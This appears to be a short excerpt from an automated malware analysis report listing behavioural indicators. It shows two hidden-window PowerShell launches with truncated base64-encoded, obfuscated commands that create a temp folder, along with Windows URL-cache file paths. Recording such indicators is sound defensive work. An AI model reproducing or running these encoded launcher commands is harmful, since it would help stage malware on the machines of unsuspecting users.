Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAbABmAHkAZgA4AD0AKAAnAFAAZgAnACsAJwA2AGwAOAB2ACcAKwAnAHoAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBuAHYAOgB0AEUAbQBwAFwAbwBmAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAbABmAHkAZgA4AD0AKAAnAFAAZgAnACsAJwA2AGwAOAB2ACcAKwAnAHoAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBuAHYAOgB0AEUAbQBwAFwAbwBmAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (with hidden window)